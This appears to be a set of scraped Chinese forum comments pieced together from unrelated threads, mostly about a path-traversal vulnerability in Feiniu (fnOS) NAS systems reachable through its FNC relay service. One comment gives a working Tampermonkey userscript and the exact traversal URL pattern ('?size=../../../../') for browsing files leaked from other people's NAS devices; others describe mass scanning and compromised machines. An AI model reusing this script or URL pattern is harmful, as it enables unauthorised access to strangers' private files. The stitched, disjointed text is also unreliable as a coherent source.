ucaime

如果能够 30 小时持续录音还是有竞争力的，但感觉价格还是太高了

dWNhaXdAaG90bWFpbC5jb20=

我最近在用这个（ https://github.com/never13254/GhostType ），一起来维护个好的开源版？

https://www.bilibili.com/video/BV1QbFszzErp/

该漏洞居然 0.8.16 版本就存在了，2024 年 9 月 5 日

@eber 应该是没仔细看这次的事件吧。即使没有映射和开放任何端口到外网，也没有通过自建的穿透到公网服务器，仍然可能会受到影响，这是 FNC 服务的设计导致的，通过遍历扫描几乎可以连接到所有开启了这个服务的机器，样本统计下来，FNC 开启率还是非常非常高的，平均下来也在 80%以上。这个是飞牛系统除硬件收入、企业订阅外的很大的商业收入来源，而且提供了免费慷慨的接入服务。

如果开启这个服务也会导致所有数据全部泄露，那我感觉不太能因为这个行为怪用户~

本质上是这个漏洞太低级了，低级到近 20 年我作为半个网安圈的人都没怎么遇到过知名系统犯过这个错误

@qianlongzt 所以一直到现在，还有非常多仍然受到影响的。有意思的是可以看到飞牛自带 nginx 的日志，找了几个分析了下，早就被轮了无数遍了。

https://imgur.com/a/ObaURjs

@coolair 这并不能避免影响。现在的这俩漏洞不只是可以看到和拿到你的文件，还可以肆意乱搞，当成肉鸡或者挖矿都是小事，还可以开内网的洞，影响面可就不是这一台机器这么简单了。

这个简单的油猴脚本就可以正常浏览用户泄露文件了

```Javascript
// ==UserScript==
// @name 路径遍历链接修复工具
// @namespace http://tampermonkey.net/
// @version 1.0
// @description 修复特定路径下的 LFI/目录遍历链接拼接问题
// @author xxx
// @match *://*/app-center-static/serviceicon/myapp/%7B0%7D/*
// @grant none
// ==/UserScript==

(function() {
'use strict';

// 获取当前页面的查询参数，即 ?size=../../../../ 部分
const currentSearch = window.location.search;
// 获取当前页面的基础路径，即 /app-center-static/serviceicon/myapp/%7B0%7D/
const currentPath = window.location.pathname;

// 选取所有的 <a> 标签
const links = document.querySelectorAll('a');

links.forEach(link => {
// 获取 HTML 中原本的 href 属性值（例如 "vol1/" 或 "bin"），而非浏览器解析后的完整 URL
const rawHref = link.getAttribute('href');

if (rawHref) {
// 核心逻辑：基础路径 + 原有查询参数 + 目标文件路径
// 结果：.../myapp/%7B0%7D/?size=../../../../vol1/
const newUrl = currentPath + currentSearch + rawHref;

// 修改链接的指向
link.href = newUrl;
}
});

console.log(`已修正 ${links.length} 个路径遍历链接。`);
})();
```

《异物志》

著名闭源翻译插件是哪个